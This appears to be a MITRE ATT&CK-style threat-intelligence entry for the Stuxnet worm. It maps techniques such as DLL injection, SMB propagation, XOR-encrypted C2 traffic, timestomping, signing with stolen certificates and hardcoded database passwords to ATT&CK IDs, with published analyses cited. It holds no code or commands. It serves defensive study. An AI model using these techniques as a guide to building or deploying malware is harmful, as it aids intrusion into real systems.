Stuxnet
Associated Software Descriptions |
|
Name | Description |
---|---|
W32.Stuxnet | (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) |
Techniques Used |
||||
Domain | ID | Name | Use | |
---|---|---|---|---|
Enterprise | T1134 | .001 | Access Token Manipulation: Token Impersonation/Theft |
Stuxnet attempts to impersonate an anonymous token to enumerate bindings in the service control manager.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) |
Enterprise | T1087 | .001 | Account Discovery: Local Account |
Stuxnet enumerates user accounts of the local host.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) |
.002 | Account Discovery: Domain Account |
Stuxnet enumerates user accounts of the domain.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) |
||
Enterprise | T1071 | .001 | Application Layer Protocol: Web Protocols |
Stuxnet uses HTTP to communicate with a command and control server. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) |
Enterprise | T1560 | .003 | Archive Collected Data: Archive via Custom Method |
Stuxnet encrypts exfiltrated data via C2 with static 31-byte long XOR keys.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) |
Enterprise | T1543 | .003 | Create or Modify System Process: Windows Service |
Stuxnet uses a driver registered as a boot start service as the main load-point.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) |
Enterprise | T1132 | .001 | Data Encoding: Standard Encoding |
Stuxnet transforms encrypted binary data into an ASCII string in order to use it as a URL parameter value.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) |
Enterprise | T1573 | .001 | Encrypted Channel: Symmetric Cryptography |
Stuxnet encodes the payload of system information sent to the command and control servers using a one byte 0xFF XOR key. Stuxnet also uses a 31-byte long static byte string to XOR data sent to command and control servers. The servers use a different static key to encrypt replies to the implant.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) |
Enterprise | T1070 | .004 | Indicator Removal: File Deletion |
Stuxnet uses an RPC server that contains a routine for file deletion and also removes itself from the system through a DLL export by deleting specific files.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) |
.006 | Indicator Removal: Timestomp |
Stuxnet extracts and writes driver files that match the times of other legitimate files.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) |
||
Enterprise | T1027 | .013 | Obfuscated Files or Information: Encrypted/Encoded File |
Stuxnet uses encrypted configuration blocks and writes encrypted files to disk.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) |
Enterprise | T1055 | .001 | Process Injection: Dynamic-link Library Injection |
Stuxnet injects an entire DLL into an existing, newly created, or preselected trusted process.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) |
Enterprise | T1090 | .001 | Proxy: Internal Proxy |
Stuxnet installs an RPC server for P2P communications.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) |
Enterprise | T1021 | .002 | Remote Services: SMB/Windows Admin Shares |
Stuxnet propagates to available network shares.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) |
Enterprise | T1053 | .005 | Scheduled Task/Job: Scheduled Task |
Stuxnet schedules a network job to execute two minutes after host infection.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) |
Enterprise | T1505 | .001 | Server Software Component: SQL Stored Procedures |
Stuxnet used xp_cmdshell to store and execute SQL code.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) |
Enterprise | T1518 | .001 | Software Discovery: Security Software Discovery |
Stuxnet enumerates the currently running processes related to a variety of security products.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) |
Enterprise | T1553 | .002 | Subvert Trust Controls: Code Signing |
Stuxnet used a digitally signed driver with a compromised Realtek certificate.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) |
Enterprise | T1078 | .001 | Valid Accounts: Default Accounts |
Stuxnet infected WinCC machines via a hardcoded database server password.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) |
.002 | Valid Accounts: Domain Accounts |
Stuxnet attempts to access network resources with a domain account’s credentials.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) |
References
- CISA. (2010, September 10). ICS Advisory (ICSA-10-272-01). Retrieved December 7, 2020.
- Matrosov, A., Rodionov, E., Harley, D., Malcho, J.. (n.d.). Stuxnet Under the Microscope. Retrieved December 7, 2020.
- Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22
- Ralph Langner. (2013, November). To Kill a Centrifuge: A Technical Analysis of What Stuxnet's Creators Tried to Achieve. Retrieved December 7, 2020.
Мы используем cookie-файлы, чтобы получить статистику, которая помогает нам улучшить сервис для вас с целью персонализации сервисов и предложений. Вы может прочитать подробнее о cookie-файлах или изменить настройки браузера. Продолжая пользоваться сайтом, вы даёте согласие на использование ваших cookie-файлов и соглашаетесь с Политикой обработки персональных данных.